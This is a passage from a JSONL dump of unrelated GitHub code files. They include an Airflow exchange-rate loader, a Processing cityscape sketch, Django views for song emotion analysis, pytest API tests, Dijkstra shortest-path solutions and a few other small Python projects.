max_days:\n yield start, start + timedelta(days=max_days)\n start = start + timedelta(days=max_days)\n days = (end - start).days\n yield start, end\n\n\ndef group_recent_pairs_by_bases(pairs_to_load_recent):\n pairs_by_bases = {}\n for pair, date in pairs_to_load_recent.items():\n base = pair.split('/')[1]\n pairs_by_bases.setdefault(base, {}).update({pair: date})\n\n return pairs_by_bases\n\n\ndef group_history_pairs_by_bases(pairs_to_load_history):\n history_pairs_by_bases = {}\n for pair in pairs_to_load_history:\n base = pair.split('/')[1]\n history_pairs_by_bases.setdefault(base, []).append(pair)\n\n return history_pairs_by_bases\n\n\ndef load_recent_pairs(db_conf, pairs_to_load_recent):\n recent_pairs_by_bases = group_recent_pairs_by_bases(pairs_to_load_recent)\n today_utc = datetime.utcnow().date()\n for base, pairs in recent_pairs_by_bases.items():\n symbols_to_search = [key.split('/')[0] for key in pairs.keys()]\n symbols_str = ','.join(symbols_to_search)\n\n earliest_date = min(pairs.values())\n for start_date, end_date in split_date_range(earliest_date, today_utc):\n resp = request_date_range(start_date,\n end_date,\n base,\n symbols_str)\n if not resp:\n raise AirflowException('Exchange API has not returned data')\n put_rates_to_stage(db_conf, resp, base, symbols_to_search)\n\n\ndef load_history_pairs(db_conf, pairs_to_load_history):\n history_pairs_by_bases = group_history_pairs_by_bases(pairs_to_load_history)\n today_utc = datetime.utcnow().date()\n for base, pairs in history_pairs_by_bases.items():\n symbols_to_search = [pair.split('/')[0] for pair in pairs]\n iter_start_date = today_utc - timedelta(days=365)\n iter_end_date = today_utc\n while symbols_to_search:\n symbols_str = ','.join(symbols_to_search)\n resp = request_date_range(iter_start_date.strftime(\"%Y-%m-%d\"),\n iter_end_date.strftime(\"%Y-%m-%d\"),\n base,\n symbols_str)\n if not resp:\n raise AirflowException('Exchange API has not returned data')\n put_rates_to_stage(db_conf, resp, base, symbols_to_search)\n symbols_left = resp[iter_start_date.strftime(\"%Y-%m-%d\")].keys()\n symbols_to_search = list(set(symbols_left) & set(symbols_to_search))\n print(symbols_to_search)\n if symbols_to_search:\n iter_end_date = iter_start_date - timedelta(days=1)\n iter_start_date = iter_end_date - timedelta(days=365)\n","repo_name":"dmitrii-listvin/store-exchangerate","sub_path":"dags/exchangerate/exchangerate.py","file_name":"exchangerate.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"21001113862","text":"import math \n\nbuildings1 = []\nbuildings2 = []\nbuildings3 = []\nbuildings4 = []\n\nmapTop = 0\nmapBottom = 0\nmapleft = 0\nmapRight = 0\nalleyway = 5\n\ndef setup():\n global mapTop, mapBottom, mapleft, mapRight\n # global buildings, buildings1\n size(601, 601, P3D)\n mapTop = -height\n mapBottom = height\n mapleft = 0\n mapRight = width\n \n camera(width/2.0, -height, (height/2.0) / tan(PI*30.0 / 180.0), width/2.0, height/10.0, 0, 0, 1, 0)\n createBuildings(middleVerticalStreet()[0], \"vertical\", buildings1, 20)\n createBuildings(middleVerticalStreet()[0], \"vertical\", buildings2, 20)\n createBuildings(middleHorizontalStreet()[0], \"horizontal\", buildings3, 20)\n createBuildings(middleHorizontalStreet()[0], \"horizontal\", buildings4, 20)\n \n \ndef draw():\n global buildings, buildings1\n background(255)\n stroke(0)\n\n # draw grid\n strokeWeight(1)\n showGrid()\n \n # draw street\n strokeWeight(5)\n 
line(*middleVerticalStreet()[0])\n line(*middleVerticalStreet()[1])\n line(*middleHorizontalStreet()[0])\n line(*middleHorizontalStreet()[1])\n \n # draw buildings\n strokeWeight(5)\n drawBuildings(middleVerticalStreet()[0], buildings1, \"left\")\n drawBuildings(middleVerticalStreet()[1], buildings2, \"right\")\n drawBuildings(middleHorizontalStreet()[0], buildings3, \"above\")\n drawBuildings(middleHorizontalStreet()[1], buildings4, \"below\")\n\n # camera\n camera(3*mouseX - width , 2*mouseY - height, 1*(height/2.0) / tan(PI*30.0 / 180.0), width/2.0, height/10.0, height/2, 0, 1, 0)\n\n\ndef showGrid():\n strokeWeight(1)\n x = 0\n while x < width :\n line(x, 0, 0, x, 0, height)\n # line(x, 0, -height, x, 0, height)\n x = x + 50\n \n # z = -height\n z = 0\n while z < height :\n line(0, 0, z, width, 0, z)\n z = z + 50\n \n strokeWeight(5)\n line(mapleft, 0, 0, mapRight, 0 , 0)\n \ndef middleVerticalStreet():\n # lineLeft = (width/2 - width/10, 0, -height, width/2 - width/10, 0, height)\n # lineRight = (width/2 + width/10, 0, -height, width/2 + width/10, 0, height)\n # lineLeft = (width/2 - width/10, 0, 0, width/2 - width/10, 0, height)\n # lineRight = (width/2 + width/10, 0, 0, width/2 + width/10, 0, height)\n # lineLeft = (width/2 - width/20, 0, 0, width/2 - width/20, 0, height)\n # lineRight = (width/2 + width/20, 0, 0, width/2 + width/20, 0, height)\n lineLeft = (width/2 - width/40, 0, 0, width/2 - width/40, 0, height)\n lineRight = (width/2 + width/40, 0, 0, width/2 + width/40, 0, height)\n \n return lineLeft, lineRight\n # line(*lineLeft)\n # line(*lineRight)\n\ndef middleHorizontalStreet():\n lineUp = (0, 0, height/2 - height/40, width, 0, height/2 - height/40)\n lineDown = (0, 0, height/2 + height/40, width, 0, height/2 + height/40)\n \n return lineUp, lineDown \n \ndef createBuildings(lineSegment, orientation, buildingArray=buildings1, amount=15):\n global buildings\n strokeWeight(5)\n # boxX = 50\n # boxY = 100\n # boxZ = 500\n \n # box(boxX, boxY, boxZ)\n \n # amount = 15\n \n # determine magnitude of line \n xAbsolute = abs(lineSegment[0]-lineSegment[3])\n yAbsolute = abs(lineSegment[1]-lineSegment[4])\n zAbsolute = abs(lineSegment[2]-lineSegment[5])\n lineMagnitude = math.sqrt(xAbsolute**2 + yAbsolute**2 + zAbsolute**2)\n\n\n # i = 0\n buildingMagnitude = 0 \n # while i < amount:\n while buildingMagnitude < lineMagnitude :\n \n boxX = int(random(10, height/10))\n boxY = int(random(10, height/10))\n boxZ = int(random(10, height/10))\n # boxX = 50\n # boxY = 50\n # boxZ = 50\n \n if orientation == \"horizontal\" :\n buildingMagnitude += boxX + alleyway\n # buildingMagnitude == boxZ + buildingMagnitude\n elif orientation == \"vertical\" :\n buildingMagnitude += boxZ + alleyway\n # buildingMagnitude == boxZ + buildingMagnitude\n # print buildingMagnitude\n \n if buildingMagnitude < lineMagnitude :\n building = [boxX, boxY, boxZ]\n buildingArray.append(building) \n \n # make skyscraper\n skyscraper = len(buildingArray)/2\n buildingArray[skyscraper][1] = int(random(60, height/2.5))\n \n \ndef drawBuildings(streetLine, buildingArray, side):\n buildings = buildingArray\n pushMatrix()\n \n for i in range(len(buildings)):\n \n if i == 0 :\n previousBuilding = [0, 0, 0]\n else:\n previousBuilding = buildings[i-1]\n \n building = buildings[i]\n \n boxX = building[0]\n boxY = building[1]\n boxZ = building[2]\n\n # pushMatrix()\n\n if side == \"left\" or side == \"right\":\n # moves buildings along the Z axis down the street\n translate(0, 0, previousBuilding[2]/2+ boxZ/2 + alleyway )\n # 
popMatrix()\n \n if side == \"left\":\n \n # # moves buildings along the Z axis down the street\n # translate(0, 0, previousBuilding[2]/2+ boxZ/2 + 5 )\n \n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(streetLine[0] - boxX/2, -boxY/2, 0) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"right\":\n # # moves buildings along the Z axis down the street\n # translate(0, 0, previousBuilding[2]/2+ boxZ/2 + 5 )\n \n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(streetLine[0] + boxX/2, -boxY/2, 0) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"above\" or side == \"below\":\n # moves buildings along the Z axis down the street\n translate(previousBuilding[0]/2+ boxX/2 + alleyway, 0, 0)\n # popMatrix()\n \n if side == \"above\":\n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(0, -boxY/2, streetLine[2] - boxZ/2) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"below\":\n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(0, -boxY/2, streetLine[2] + boxZ/2) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n popMatrix()\n \n \n \n \n \n \n \n \n","repo_name":"andrewdonato/processing-projects","sub_path":"cityscape/cityscape.pyde","file_name":"cityscape.pyde","file_ext":"pyde","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"70650891056","text":"# -*- coding: utf-8 -*-\nfrom ssf_api import *\nimport pickle\nimport io\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nimport logging\n#import utilities\n#log = utilities.setup_logger()\n\n\ndef create_rawData_pickles(dataLocation):\n\n # Walks through the folder to get names/strings of all the files\n FileList = folderWalk(dataLocation)\n\n # Processed File count\n fileNum = 0\n\n # Target location to store processed data\n createDirectory(\"./DATA/PROCESSED-DATA/collection/\")\n\n # Catches all the files which report exception while processing, along with the exception\n errs = \"\\n{:<100} {:<100}\".format('FileName','Exception')\n\n\n for rawFilePath in FileList:\n\n try:\n # sentenceList : list of ssf_api.Sentence objects\n # globalWordList : list of ssf_api.Word objects\n sentenceList, globalWordList = extractSSFannotations(rawFilePath)\n\n # Get the SSFInfo object\n ssfinfo = SSFInfo(sentenceList, globalWordList)\n\n # Populates the ssfinfo.sentenceList[indx].nodeDict['key'].childList\n # For all the indxs in sentenceList and key in nodeDict of that sentence\n createChildList(ssfinfo)\n\n except Exception as e:\n errs += \"\\n{:<100} {:<100}\".format(os.path.basename(rawFilePath), e)\n continue\n\n # If the file pointed by rawFilePath doesn't contain any sentence\n if(sentenceList == None):\n loggin.debug(\"No sentence in\"+rawFilePath+\"Continuing\")\n continue\n\n # Pickle the ssinfo Object into the collections\n pickle.dump(ssfinfo, open(\"./DATA/PROCESSED-DATA/collection/\"+rawFilePath.split('/')[-1]+'.pkl','w'))\n fileNum+=1\n \n #exportModel(\"PROCESSED-DATA/annotatedData\",discourseFileCollection)\n logging.info(\"Processed %d raw files correctly\",fileNum)\n logging.info(\"The following raw files could not be processed 
:\"+errs)\n\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n logging.critical(\"Please give RAW-data folder's location\")\n logging.critical(\"\")\n option = raw_input(\"\\n\\tShould ./DATA/RAW-DATA/ be used as the dir? [Y|n]\")\n if option == 'y' or option == 'Y':\n dataLocation = './DATA/RAW-DATA/'\n else:\n logging.critical(\"Please re-run the script with command line arguments\")\n exit()\n else:\n dataLocation = sys.argv[1]\n \n create_rawData_pickles(dataLocation)\n","repo_name":"akshatcx/coreference_resolution_cl","sub_path":"scripts/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"71793921135","text":"from django.contrib.auth.models import User\nfrom django.http import JsonResponse\n\nfrom emotions.serializers import UserSerializer, RegisterUserSerializer, SongSerializer, PlaylistSerializer\nfrom emotions.models import Song, Playlist\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.generics import RetrieveAPIView, CreateAPIView\n\nimport os\nimport json\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport lyricsgenius as lg\nimport re\nfrom transformers import pipeline\nimport collections\nimport pandas as pd\n\nspotify_client_id = os.environ['SPOTIPY_CLIENT_ID']\nspotify_secret = os.environ['SPOTIPY_CLIENT_SECRET']\nspotipy_redirect_uri = os.environ['SPOTIPY_REDIRECT_URI']\ngenius_access_token = os.environ['GENIUS_ACCESS_TOKEN']\nuser_id = 'spotify:user:22gothp7kyvmsh7ryebt7vjqq'\n\nsp = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())\nge = lg.Genius(genius_access_token)\n\ndebug = False\nemotion = None\nif debug:\n emotion = pipeline('sentiment-analysis', model='arpanghoshal/EmoRoBERTa')\n def get_emotion_label(text):\n return(emotion(text)[0]['label'])\n\n# Create your views here.\n@api_view(['POST'])\ndef test(request):\n try:\n spotify_playlist_id = request.data['link']\n playlist = sp.user_playlist_tracks(user_id, spotify_playlist_id)\n tracks = []\n for item in playlist['items']:\n track_id = item['track']['id']\n string = (item['track']['name']).split(\"(\", 1)\n track_name = string[0]\n track_artist = item['track']['artists'][0]['name']\n tracks.append((track_id, track_name, track_artist))\n\n playlistDDict = collections.defaultdict(int)\n\n for id, title, artist in tracks:\n if Song.objects.filter(id=id):\n song = Song.objects.filter(id=id)\n for key in song[0].emotions:\n playlistDDict[key] += song[0].emotions[key]\n continue\n try:\n if debug:\n song = ge.search_song(title, artist)\n songLyrics = song.lyrics\n modifiedSongLyrics = re.sub('\\[.+\\]', '', songLyrics)\n many_strings = re.split('\\n', modifiedSongLyrics)\n \n songDF = pd.DataFrame(many_strings)\n songDF.rename(columns = {0:'text'}, inplace = True)\n songDF['emotion'] = songDF['text'].apply(get_emotion_label)\n\n songJSONstring = songDF.to_json()\n songJSON = json.loads(songJSONstring)\n songCounts = collections.Counter(songJSON['emotion'].values())\n songDict = dict(songCounts)\n\n for key in songDict:\n playlistDDict[key] += songDict[key]\n \n songData = {\"id\": id, \"title\": title, \"artist\": artist, \"emotions\": songDict}\n\n serializerSong = SongSerializer(data=songData)\n if serializerSong.is_valid():\n serializerSong.save()\n continue\n except Exception 
as e:\n return JsonResponse({\"error\": str(e)}, status=400)\n \n songs = [song[0] for song in tracks]\n playlistDict = dict(playlistDDict)\n\n data = {\"id\": spotify_playlist_id + \"7\", \"songs\": songs, \"emotions\": playlistDict}\n\n serializerPlaylist = PlaylistSerializer(data=data)\n if serializerPlaylist.is_valid():\n serializerPlaylist.save()\n return Response(data)\n except Exception as e:\n return JsonResponse({\"error\": str(e)}, status=400)\n\n@api_view(['GET'])\ndef getPlaylists(request):\n playlists = Playlist.objects.all()\n serializer = PlaylistSerializer(playlists, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef getSongs(request):\n songs = Song.objects.all()\n serializer = SongSerializer(songs, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef addSongs(request):\n if isinstance(request.data['data'], str):\n data = json.loads(request.data['data'])\n else:\n data = request.data['data']\n serializer = SongSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated]\n\nclass UserAPIView(RetrieveAPIView):\n permission_classes = [permissions.AllowAny]\n serializer_class = UserSerializer\n def get_object(self):\n return self.request.user\n\nclass RegisterUserAPIView(CreateAPIView):\n permission_classes = [permissions.AllowAny]\n serializer_class = RegisterUserSerializer\n\n","repo_name":"slegaspi19/musiFeel","sub_path":"backend/emotions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"32997723070","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nARENA_SIZE = 1.2\n\narena = 2 * ARENA_SIZE * np.array([[0., 0.], [0., 1.], [1., 1.], [1., 0.], [0., 0.]]).T - ARENA_SIZE\nprint(arena)\nred_home = np.array([[0.8, 1.2, 1.2, 0.8], [0.8, 0.8, 1.2, 1.2]])\nblue_home = (red_home.T + np.array([0., -2., ])).T\n\ndef plot_scanning_path(ax, R=1., step_multiple=1., start_multiple=0.7):\n ax.set_aspect('equal')\n ax.plot(*arena, color='darkgrey', linewidth=3)\n ax.tick_params(axis='both', which='both', left=False, bottom=False,\n labelbottom=False, labelleft=False)\n\n step = step_multiple * R\n # start = start_multiple * R\n start = 0.4\n X = np.arange(start, ARENA_SIZE / 2, step)\n Y = np.arange(start, ARENA_SIZE, step)\n\n for x in X:\n for y in Y:\n circle = plt.Circle((x, y), radius=R, alpha=0.1)\n ax.add_artist(circle)\n\n circle = plt.Circle((ARENA_SIZE-x, y), radius=R, alpha=0.1, color='tab:red')\n ax.add_artist(circle)\n\n path_xs = np.repeat(X, len(Y))\n path_ys = np.concatenate([Y[::(-1)**(i%2)] for i in range(len(X))])\n\n ax.plot(path_xs, path_ys, 'o-', color='tab:blue', linewidth=2)\n ax.plot(ARENA_SIZE - path_xs, path_ys, 'o-', color='tab:red', linewidth=2)\n\n\ndef plot_scanning_waypoints(ax, waypoints, radius=1., plot_reflection=True):\n ax.set_xlim(-1.4, 1.4)\n ax.set_ylim(1.4, -1.4)\n ax.set_aspect('equal')\n ax.plot(*arena, color='darkgrey', linewidth=3)\n ax.tick_params(axis='both', which='both', left=False, bottom=False,\n labelbottom=False, labelleft=False)\n\n ax.add_artist(plt.Polygon(red_home.T, color='tab:red', alpha=0.2))\n ax.add_artist(plt.Polygon(blue_home.T, color='tab:blue', alpha=0.2))\n\n for x, y in waypoints:\n circle = plt.Circle((x, 
y), radius=radius, color='tab:red', alpha=0.2)\n ax.add_artist(circle)\n if plot_reflection:\n circle = plt.Circle((x, - y), radius=radius, alpha=0.1, color='tab:blue')\n ax.add_artist(circle)\n\n ax.plot(*waypoints.T, 'o-', color='tab:red', linewidth=2)\n if plot_reflection:\n blue_waypoints = waypoints * np.array([1, -1])\n ax.plot(*blue_waypoints.T, 'o-', color='tab:blue', linewidth=2)\n\n\n# ROWS = 3\n# COLS = 3\n#\n# fig, axes = plt.subplots(nrows=ROWS, ncols=COLS)\n#\n# rs, steps = np.mgrid[0.4:1:1j*ROWS, 0.7:1.3:1j * COLS]\n# for i, (ax, r, step) in enumerate(zip(axes.flat, rs.flat, steps.flat)):\n# plot_scanning_path(ax, r, step_multiple=step)\n#\n# if i % ROWS == 0:\n# ax.set_ylabel(f'$R={r}$m', fontsize=14)\n#\n# if i // COLS == 0:\n# ax.set_title(f'step size=${step}R$', fontsize=14)\n\nwaypoints = np.array([\n [1., 1.],\n [.8, 1.],\n [.6, 1.],\n])\n\n\nfig, ax = plt.subplots()\nplot_scanning_waypoints(ax, waypoints, radius=0.5, plot_reflection=True)\nplt.show()","repo_name":"TobyBoyne/idp-simulation","sub_path":"report/scanning_diagram.py","file_name":"scanning_diagram.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"32269311291","text":"import pytest\nimport falcon\nimport datetime\n\nfrom app.model.db import BookEntity\nfrom .base_api_test import BaseApiTest\n\n\ndef data():\n return {\n 'title': 'Book Title',\n 'author': 'Book Author',\n 'published_date': datetime.date.fromisocalendar(2020, 1, 2),\n 'isbn': '1234567890',\n 'page_count': 100,\n 'cover_url': 'http://www.someurl.pl/book/cover?size=small',\n 'language': 'pl'\n }\n\n\nclass TestBookListGet(BaseApiTest):\n URL = '/api/books'\n\n def setup_class(cls):\n super().setup_class(cls)\n cls.book = BookEntity(book_id=None, **data())\n cls.book_repository.insert_book(cls.book)\n\n def test_with_book(self):\n res = self.client.simulate_get(self.URL)\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n def test_filter_by_author(self):\n res = self.client.simulate_get(f'{self.URL}?author={self.book.author}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?author={self.book.author}asd')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_title(self):\n res = self.client.simulate_get(f'{self.URL}?title={self.book.title}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?author={self.book.title}asd')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_date(self):\n date = (self.book.published_date + datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n res = self.client.simulate_get(f'{self.URL}?published_date__to={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n date = (self.book.published_date - datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n res = self.client.simulate_get(f'{self.URL}?published_date__from={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n date = (self.book.published_date - datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n print(date)\n res = self.client.simulate_get(f'{self.URL}?published_date__to={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_language(self):\n res = 
self.client.simulate_get(f'{self.URL}?language={self.book.language}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?language=qw')\n assert res.status == falcon.HTTP_200\n assert res.json == []","repo_name":"pberezow/zadanie-rekrutacyjne-backend","sub_path":"tests/endpoints/test_book_list_get.py","file_name":"test_book_list_get.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"34707107783","text":"# 전보\n\n# 나의 풀이\nimport heapq\n\nINF = int(1e9)\n\nn, m, start = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\n\nfor _ in range(m):\n fromNode, toNode, dist = map(int, input().split())\n graph[fromNode].append((toNode, dist))\n\ndef dijkstra(graph, start, end):\n distance = [INF] * (n + 1)\n\n q = []\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, toNode = heapq.heappop(q)\n\n if distance[toNode] < dist:\n continue\n \n for node in graph[toNode]:\n cost = dist + node[1]\n if cost < distance[node[0]]:\n distance[node[0]] = cost\n heapq.heappush(q, (node[1], node[0]))\n\n return distance[end]\n\ncount = 0\nresult = 0\nfor i in range(1, n + 1):\n dist = dijkstra(graph, start, i)\n if dist != INF:\n count += 1\n result = max(result, dist)\n\nprint(count, result)\n\n\n# 해설\nimport heapq\nimport sys\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m, start = map(int, input().split())\ngraph = [[] for i in range(n + 1)]\ndistance = [INF] * (n + 1) \n\nfor _ in range(m):\n x, y, z = map(int, input().split())\n graph[x].append((y, z))\n\ndef dijkstra(start):\n q = []\n\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\ndijkstra(start)\n\ncount = 0\nmax_distance = 0\n\nfor d in distance:\n if d != INF:\n count += 1\n max_distance = max(max_distance, d)\n\nprint(count - 1, max_distance) # 시작 노드는 제외해야 함\n\n\n# 나는 모든 경우에 대해 다익스트라 알고리즘을 수행해야 한다고 생각했었다. 사실은 다익스트라 한 번으로도 가능했다.\n# 왜 모든 경우에 대해 다익스트라 알고리즘을 수행?\n# -> 그리디하다는 생각이 하나의 목적지에 대한 경로만 구한다고 생각했다. -> 사실은 모든 목적지에 대해 구하고 선택하는 것이었다.\n# -> 다익스트라 알고리즘과 플로이드 워셜 알고리즘의 차이를 다르게 생각했던것 같다.\n# -> 다익스트라 알고리즘은 그리디 방식으로 거리를 구하고 플로이드 워셜 알고리즘은 다이나믹 프로그래밍을 이용한다.\n# -> 다익스트라 알고리즘은 출발지가 정해져있지만, 플로이드 워셜 알고리즘은 모든 출발지를 고려한다. 
(이 점을 놓치고 있었다)\n# -> 즉, 다익스트라 알고리즘은 출발지 1 - 목적지 n, 플로이드 워셜 알고리즘은 출발지 n - 목적지 n 이다.","repo_name":"aaronsatae/study-algorithm","sub_path":"dongbinBook/shortest-path-2.py","file_name":"shortest-path-2.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"24364211111","text":"import unittest\n\nfrom unittest import mock\nfrom stoqlib.lib.component import remove_utility, get_utility, provide_utility\nfrom kiwi.ui.widgets.label import ProxyLabel\nfrom stoqlib.lib.interfaces import IAppInfo\nfrom stoqlib.lib.settings import get_settings\n\nfrom stoq.main import main\nfrom stoq.gui.shell.bootstrap import ShellBootstrap\n\n\nclass TestMain(unittest.TestCase):\n def setUp(self):\n self._mocks = []\n\n self._iappinfo = get_utility(IAppInfo)\n # Shell will provide this utility\n remove_utility(IAppInfo)\n\n # If the locale is changed here, gui tests will break\n mocked = mock.patch.dict(get_settings()._root, clear=True)\n self._mocks.append(mocked)\n\n # Do not show the splash screen during the tests\n mocked = mock.patch('stoq.lib.gui.widgets.splash.show_splash',\n new=lambda: None)\n self._mocks.append(mocked)\n\n # If a dependency is missing, avoid showing an error message\n # or else jenkins will hang\n mocked = mock.patch('stoq.lib.dependencies.DependencyChecker._error',\n new=lambda *args, **kwargs: None)\n self._mocks.append(mocked)\n\n for mocked in self._mocks:\n mocked.start()\n\n def tearDown(self):\n provide_utility(IAppInfo, self._iappinfo, replace=True)\n # Shell.bootstrap calls\n # ProxyLabel.replace('$CURRENCY', get_localeconv()['currency_symbol'])\n # and that will break uitests\n if '$CURRENCY' in ProxyLabel._label_replacements:\n del ProxyLabel._label_replacements['$CURRENCY']\n\n for mocked in self._mocks:\n mocked.stop()\n\n def test_shell_bootstrap(self):\n options = mock.Mock()\n bootstrap = ShellBootstrap(options=options, initial=True)\n mocks = []\n # This will fail since testsuit already setup it\n mocks.append(\n mock.patch.object(bootstrap, '_setup_gobject', new=lambda: None))\n # This will change the locale of all the tests that come after it,\n # making a lot of them fail\n mocks.append(\n mock.patch.object(bootstrap, '_set_user_locale', new=lambda: None))\n\n for mocked in mocks:\n mocked.start()\n\n try:\n bootstrap.bootstrap()\n finally:\n for mocked in mocks:\n mocked.stop()\n\n @mock.patch('stoq.gui.shell.bootstrap.boot_shell')\n def test_main(self, boot_shell):\n main(['stoq'])\n boot_shell().main.assert_called_once_with(None, None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable'])\n boot_shell().main.assert_called_once_with('payable', None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable/'])\n boot_shell().main.assert_called_once_with('payable', None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable', 'AddPayment'])\n boot_shell().main.assert_called_once_with('payable', 'AddPayment')\n boot_shell.reset_mock()\n\n with self.assertRaises(SystemExit):\n main(['stoq', '--version'])\n\n with self.assertRaisesRegex(\n SystemExit,\n r\"'no-such-app' is not an application. 
\"\n r\"Valid applications are: \\[[a-z,\\' ]+\\]\"):\n main(['stoq', 'no-such-app'])\n","repo_name":"stoq/stoq","sub_path":"stoq/gui/test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"56"} +{"seq_id":"37463658383","text":"from hardware.cpu import TaskStateSegment\nimport logging\nlog= logging.getLogger('os')\n\nCREATED, RUNNING, RUNNABLE, BLOCKED, TERMINATED= range(5)\n\nclass PCB:\n '''Process Control Block'''\n \n def __init__(self, pid, start_address, size, pc, sched_info, changestate_callback=lambda pcb, oldstate, newstate:None):\n self.pid= pid #PID\n self.start_address= start_address #of program in memory\n self.size= size #of program in memory\n self.tss= TaskStateSegment() #cpu context identifier\n self.tss.PC= pc #address of first instruction\n self.sched_info=sched_info #sheduling info\n self.changestate_callback= changestate_callback #will be called on state change\n self.state= CREATED\n self.changeState( RUNNABLE, just_started= True )\n\n def changeState( self, new_state, just_started= False):\n assert new_state in (RUNNING, RUNNABLE, BLOCKED, TERMINATED)\n if new_state == RUNNING:\n assert self.state == RUNNABLE\n if new_state == RUNNABLE:\n assert (self.state in (BLOCKED,RUNNING)) or just_started\n if new_state == BLOCKED:\n assert self.state == RUNNING\n if new_state == TERMINATED:\n assert self.state in (RUNNABLE, BLOCKED)\n self.changestate_callback( self, self.state, new_state)\n self.state= new_state\n\n def __repr__(self):\n return \"PCB \"+str(self.pid)\n","repo_name":"goncalopp/cpu_scheduler_emu","sub_path":"operating_system/pcb.py","file_name":"pcb.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"39074029443","text":"import json\nimport logging\n\nfrom aws_lambda_powertools import Tracer # type: ignore\nfrom edit import edit_user_group # type: ignore\nfrom models.api_response import LambdaResponse, Message\nfrom models.users import UserGroupsApiEditInput\nfrom pydantic import ValidationError\n\nfrom database import init_db\n\ntracer = Tracer(service=\"edit_user_group\")\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.basicConfig(level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\nCONNECTION = None\n\n\n@tracer.capture_lambda_handler(capture_response=False)\ndef lambda_handler(event, context):\n global CONNECTION\n\n if CONNECTION is None:\n CONNECTION = init_db()\n\n try:\n owner_id = event[\"requestContext\"][\"authorizer\"][\"lambda\"][\"sub\"]\n payload = json.loads(event[\"body\"])\n user_group_id = event[\"pathParameters\"][\"id\"]\n m = UserGroupsApiEditInput.parse_obj(payload)\n response = edit_user_group(owner_id, user_group_id, m, CONNECTION)\n logger.info(response)\n except ValidationError:\n logger.error(\"Validation input error\")\n return LambdaResponse(\n statusCode=400, body=(Message(message=\"Bad request\")).json()\n ).dict()\n\n return response\n","repo_name":"hydocloud/backend","sub_path":"microservices/user/src/edit_user_group/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"7905803881","text":"from enum import Enum\n\n\nclass MessageType(Enum):\n SessionCreation = 